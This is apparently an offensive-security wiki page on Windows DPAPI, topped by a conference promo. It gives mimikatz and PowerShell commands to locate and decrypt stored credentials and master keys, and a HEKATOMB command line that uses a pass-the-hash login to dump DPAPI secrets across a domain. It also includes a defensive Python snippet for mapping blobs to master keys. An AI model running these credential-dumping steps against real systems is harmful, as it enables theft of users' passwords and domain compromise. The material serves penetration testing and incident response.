RootedCON is the most relevant cybersecurity event in Spain and one of the most important in Europe. With the mission of promoting technical knowledge, this congress is a boiling meeting point for technology and cybersecurity professionals in every discipline.
The Data Protection API (DPAPI) is primarily utilized within the Windows operating system for the symmetric encryption of asymmetric private keys, leveraging either user or system secrets as a significant source of entropy. This approach simplifies encryption for developers by enabling them to encrypt data using a key derived from the user's logon secrets or, for system encryption, the system's domain authentication secrets, thus obviating the need for developers to manage the protection of the encryption key themselves.
Among the personal data protected by DPAPI are:
# From cmd
vaultcmd /listcreds:"Windows Credentials" /all
# From mimikatz
mimikatz vault::list
The protected credential files can be located in:
dir /a:h C:\Users\username\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\
Get credentials info using mimikatz dpapi::cred. In the response you can find interesting info such as the encrypted data and the guidMasterKey.
mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\28350839752B38B238E5D56FDD7891A7
[...]
guidMasterKey : {3e90dd9e-f901-40a1-b691-84d7f647b8fe}
[...]
pbData : b8f619[...snip...]b493fe
[..]
You can use the mimikatz module dpapi::cred with the appropriate /masterkey to decrypt:
dpapi::cred /in:C:\path\to\encrypted\file /masterkey:<MASTERKEY>
The DPAPI keys used for encrypting the user's RSA keys are stored under the %APPDATA%\Microsoft\Protect\{SID} directory, where {SID} is the Security Identifier of that user. The DPAPI key is stored in the same file as the master key that protects the user's private keys. It is usually 64 bytes of random data. (Notice that this directory is protected, so you cannot list it using dir from cmd, but you can list it from PowerShell.)
Get-ChildItem C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem C:\Users\USER\AppData\Local\Microsoft\Protect
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\
Get-ChildItem -Hidden C:\Users\USER\AppData\Roaming\Microsoft\Protect\{SID}
Get-ChildItem -Hidden C:\Users\USER\AppData\Local\Microsoft\Protect\{SID}
This is what a bunch of a user's Master Keys looks like:
Usually each master key is an encrypted symmetric key that can decrypt other content. Therefore, extracting the encrypted Master Key is interesting in order to later decrypt the other content encrypted with it.
Check the post https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++ for an example of how to extract the master key and decrypt it.
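The guidMasterKey shown in the dpapi::cred output above sits unencrypted in the DPAPI blob header, so an incident responder can map every credential file to the master key that protects it without decrypting anything. The following is an added example, not code from the original page or from mimikatz; the helper names, the "not-a-dpapi-blob" label and the sample blob are assumptions constructed for illustration.

```python
import struct
import uuid
from pathlib import Path
from typing import Optional

# Well-known DPAPI provider GUID, in the little-endian layout used on disk.
PROVIDER = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb").bytes_le


def master_key_guid(data: bytes) -> Optional[str]:
    """Return the guidMasterKey of the first DPAPI blob found in data, or None."""
    # Search for the provider GUID instead of trusting a fixed offset, because
    # credential files wrap the blob in a small header of their own.
    pos = data.find(PROVIDER)
    while pos != -1:
        start = pos - 4          # dwVersion precedes the provider GUID
        end = pos + 16 + 4 + 16  # provider GUID, dwMasterKeyVersion, guidMasterKey
        if start >= 0 and end <= len(data):
            (version,) = struct.unpack_from("<I", data, start)
            if version == 1:
                return str(uuid.UUID(bytes_le=data[pos + 20:pos + 36]))
        pos = data.find(PROVIDER, pos + 1)
    return None


def inventory(cred_dir: Path) -> dict:
    """Map each master key GUID to the credential file names that reference it."""
    found = {}
    for f in sorted(cred_dir.iterdir()):
        if f.is_file():
            guid = master_key_guid(f.read_bytes())
            found.setdefault(guid or "not-a-dpapi-blob", []).append(f.name)
    return found


def sample_blob(guid: str) -> bytes:
    """Constructed input: 12 filler bytes, then a blob header with no real ciphertext."""
    return (b"\x00" * 12 + struct.pack("<I", 1) + PROVIDER
            + struct.pack("<I", 1) + uuid.UUID(guid).bytes_le + b"\x00" * 32)


if __name__ == "__main__":
    # The GUID below is the one shown in the dpapi::cred output on this page.
    print(master_key_guid(sample_blob("3e90dd9e-f901-40a1-b691-84d7f647b8fe")))
```

Master key files under Protect\{SID} are named by GUID, so the keys of the inventory() result tell you which master key files matter when scoping a suspected DPAPI compromise.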
SharpDPAPI is a C# port of some DPAPI functionality from @gentilkiwi's Mimikatz project.
HEKATOMB is a tool that automates the extraction of all users and computers from the LDAP directory and the extraction of the domain controller backup key through RPC. The script will then resolve all computers' IP addresses and perform an smbclient on all computers to retrieve all DPAPI blobs of all users and decrypt everything with the domain backup key.
python3 hekatomb.py -hashes :ed0052e5a66b1c8e942cc9481a50d56 DOMAIN.local/administrator@10.0.0.1 -debug -dnstcp
With the computer list extracted from LDAP you can find every subnetwork, even the ones you didn't know about!
"Because Domain Admin rights are not enough. Hack them all."
DonPAPI can dump secrets protected by DPAPI automatically.